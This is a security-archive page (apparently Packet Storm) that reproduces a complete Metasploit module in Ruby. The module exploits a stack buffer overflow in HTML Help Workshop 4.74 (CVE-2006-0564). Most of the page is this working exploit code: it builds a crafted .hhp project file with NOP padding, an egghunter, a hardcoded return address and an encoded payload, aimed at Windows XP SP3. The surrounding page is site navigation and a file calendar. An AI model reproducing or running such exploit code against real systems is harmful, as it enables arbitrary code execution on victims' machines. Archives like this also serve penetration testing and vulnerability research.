what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
Posted Dec 31, 2009
Authored by bratax, jduck | Site metasploit.com

This Metasploit module exploits a stack overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
advisories | CVE-2006-0564
SHA-256 | d8999e37ae0660f6d0ccb78297cd00f678139931f395ba7c381dff454cfdddd2

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bratax', 'jduck' ],
'Version' => '$Revision: 7759 $',
'References' =>
[
[ 'CVE', '2006-0564' ],
[ 'OSVDB', '22941' ],
[ 'URL', 'http://www.exploit-db.com/exploits/1470' ],
[ 'URL', 'http://www.exploit-db.com/exploits/1495' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
'StackAdjustment' => -4800,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
],
'Privileged' => false,
'DisclosureDate' => 'Feb 06 2006',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']),
], self.class)

end

def exploit

# use the egghunter!
eh_stub, eh_egg = generate_egghunter

off = target['Offset']
idxf = ""
idxf << make_nops(off - eh_stub.length)
idxf << eh_stub
idxf << [target.ret].pack('V')

sploit = "[OPTIONS]\r\n"
sploit << "Contents file="
sploit << idxf
sploit << "\r\n"
sploit << "\r\n"
sploit << "[FILES]\r\n"
sploit << "\r\n"
sploit << eh_egg * 2
sploit << payload.encoded

hhp = sploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(hhp)
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close